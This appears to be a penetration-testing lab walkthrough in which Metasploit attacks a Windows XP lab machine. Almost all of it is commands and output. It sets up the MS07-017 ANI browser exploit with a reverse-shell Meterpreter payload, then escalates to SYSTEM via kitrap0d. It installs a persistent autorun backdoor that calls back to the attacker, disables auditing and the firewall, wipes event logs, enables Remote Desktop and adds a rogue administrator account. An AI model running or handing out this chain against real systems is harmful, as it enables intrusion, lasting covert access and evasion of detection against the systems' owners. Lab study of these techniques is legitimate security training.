Target Host: 192.168.1.50/24 (LON-CL1)
Step 1: Create a resource file in /sources directory
root@bt:~# nano /sources/ie_ani
Enter the following as the contents of ie_ani file.
use windows/browser/ms07_017_ani_loadimage_chunksize
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.252
set SRVPORT 80
set LHOST 192.168.1.252
set LPORT 443
set URIPATH /you_win
exploit
Press Ctrl-X and Y, then press Enter to save the file.
Step 2: Launch Metasploit from its working directory
root@bt:~# cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3# ./msfconsole -r /sources/ie_ani
resource (/sources/ie_ani)> use windows/browser/ms07_017_ani_loadimage_chunksize
resource (/sources/ie_ani)> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource (/sources/ie_ani)> set SRVHOST 192.168.1.252
SRVHOST => 192.168.1.252
resource (/sources/ie_ani)> set SRVPORT 80
SRVPORT => 80
resource (/sources/ie_ani)> set LHOST 192.168.1.252
LHOST => 192.168.1.252
resource (/sources/ie_ani)> set LPORT 443
LPORT => 443
resource (/sources/ie_ani)> set URIPATH /you_win
URIPATH => /you_win
resource (/sources/ie_ani)> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.252:443
[*] Using URL: http://192.168.1.252:80/you_win
[*] Server started.
Step 3: Launch Internet Explorer (IE) on your target machine
Type the following in the URL:
http://192.168.1.252/you_win
Switch to your machine. Check if you've got the connection from your target.
Once connected, you can continue interact with Meterpreter
msf exploit(ms07_017_ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.50:1162...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) to 192.168.1.50:1162...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1163) at Wed Sep 29 12:08:22 +0800 2010
Press Enter to check the opened sessions.
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter LON-CL1\testuser @ LON-CL1 192.168.1.252:443 -> 192.168.1.50:1163
msf exploit(ms07_017_ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: LON-CL1
OS : Windows XP (Build 2600, Service Pack 2).
Arch : x86
Language: en_US
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0
Check our privilege level
meterpreter > getuid
Server username: LON-CL1\testuser
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeShutdownPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[-] core_channel_open: Operation failed: 5
Escalate our privilege
meterpreter > run kitrap0d
[*] Currently running as LON-CL1\testuser
[*] Loading the vdmallowed executable and DLL from the local system...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\LnZbxqeuZgMB.exe...
[*] Uploading vdmallowed to C:\DOCUME~1\testuser\LOCALS~1\Temp\vdmexploit.dll...
[*] Escalating our process (PID:1316)...
--------------------------------------------------
Windows NT/2K/XP/2K3/VISTA/2K8/7 NtVdmControl()->KiTrap0d local ring0 exploit
-------------------------------------------- taviso@sdf.lonestar.org ---
[?] GetVersionEx() => 5.1
[?] NtQuerySystemInformation() => \WINDOWS\system32\ntkrnlpa.exe@804D7000
[?] Searching for kernel 5.1 signature: version 2...
[+] Trying signature with index 3
[+] Signature found 0x285ee bytes from kernel base
[+] Starting the NTVDM subsystem by launching MS-DOS executable
[?] CreateProcess("C:\WINDOWS\twunk_16.exe") => 180
[?] OpenProcess(180) => 0x7e8
[?] Injecting the exploit thread into NTVDM subsystem @0x7e8
[?] WriteProcessMemory(0x7e8, 0x2070000, "VDMEXPLOIT.DLL", 14);
[?] WaitForSingleObject(0x7d4, INFINITE);
[?] GetExitCodeThread(0x7d4, 0012FF44); => 0x77303074
[+] The exploit thread reports exploitation was successful
[+] w00t! You can now use the shell opened earlier
[*] Deleting files...
[*] Now running as NT AUTHORITY\SYSTEM
meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
SeDebugPrivilege
SeTcbPrivilege
SeCreateTokenPrivilege
SeAssignPrimaryTokenPrivilege
SeLockMemoryPrivilege
SeIncreaseQuotaPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeSystemtimePrivilege
SeProfileSingleProcessPrivilege
SeIncreaseBasePriorityPrivilege
SeCreatePagefilePrivilege
SeCreatePermanentPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeShutdownPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeChangeNotifyPrivilege
SeUndockPrivilege
SeManageVolumePrivilege
meterpreter > upload /tmp/hacked.txt C:\\WINDOWS\\System32
[*] uploading : /tmp/hacked.txt -> C:\WINDOWS\System32
[*] uploaded : /tmp/hacked.txt -> C:\WINDOWS\System32\hacked.txt
Maintain access by uploading Meterpreter agent
meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i
-p
-r
[-] Error in script: LocalJumpError unexpected return
meterpreter > run persistence -A -X -p 443 -r 192.168.1.252
[*] Creating a persistent agent: LHOST=192.168.1.252 LPORT=443 (interval=5 onboot=true)
[*] Persistent agent script is 613927 bytes long
[*] Uploaded the persistent agent to C:\DOCUME~1\testuser\LOCALS~1\Temp\NooAHDFfrAL.vbs
[*] Agent executed with PID 1732
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\NaPNlcSlsZRpqA
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/persistence/LON-CL1_20100929.2413/clean_up__20100929.2413.rc
Exit from the target system.
meterpreter > exit
Step 4: Create a listener on our machine
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.252
LHOST => 192.168.1.252
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.252:443
[*] Starting the payload handler...
[*] Sending stage (748544 bytes) to 192.168.1.50
[*] Meterpreter session 1 opened (192.168.1.252:443 -> 192.168.1.50:1176) at Wed Sep 29 12:30:27 +0800 2010
Clearing tracks (housekeeping)
meterpreter > run disable_audit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run getcountermeasure -h
Getcountermeasure -- List (or optionally, kill) HIPS and AV
processes, show XP firewall rules, and display DEP and UAC
policies
OPTIONS:
-d Disable built in Firewall
-h Help menu.
-k Kill any AV, HIPS and Third Party Firewall process found.
meterpreter > run getcountermeasure -d
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Internal firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] External firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Disabling Built in Firewall.....
[*] Checking DEP Support Policy...
meterpreter > clearev
[*] Wiping 942 records from Application...
[*] Wiping 1984 records from System...
[*] Wiping 1 records from Security...
Enabling and Accessing Remote Desktop
meterpreter > run getgui -e
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up__20100929.3437.rc
meterpreter > shell
Process 820 created.
Channel 18 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\testuser\Desktop>net user hacker P@ssw0rd /add
net user hacker P@ssw0rd /add
The command completed successfully.
C:\Documents and Settings\testuser\Desktop>net localgroup administrators hacker /add
net localgroup administrators hacker /add
The command completed successfully.
C:\Documents and Settings\testuser\Desktop>^C
Terminate channel 18? [y/N] y
meterpreter > ipconfig
MS TCP Loopback interface
Hardware MAC: 00:00:00:00:00:00
IP Address : 127.0.0.1
Netmask : 255.0.0.0
VMware Accelerated AMD PCNet Adapter - Packet Scheduler Miniport
Hardware MAC: 00:0c:29:d3:6a:60
IP Address : 192.168.1.50
Netmask : 255.255.255.0
meterpreter >
Remote Desktop Connection
Open a new shell console, and run Remote Desktop client to connect to the target machine.
root@bt:~# rdesktop 192.168.1.50
WARNING: Remote desktop does not support colour depth 24; falling back to 16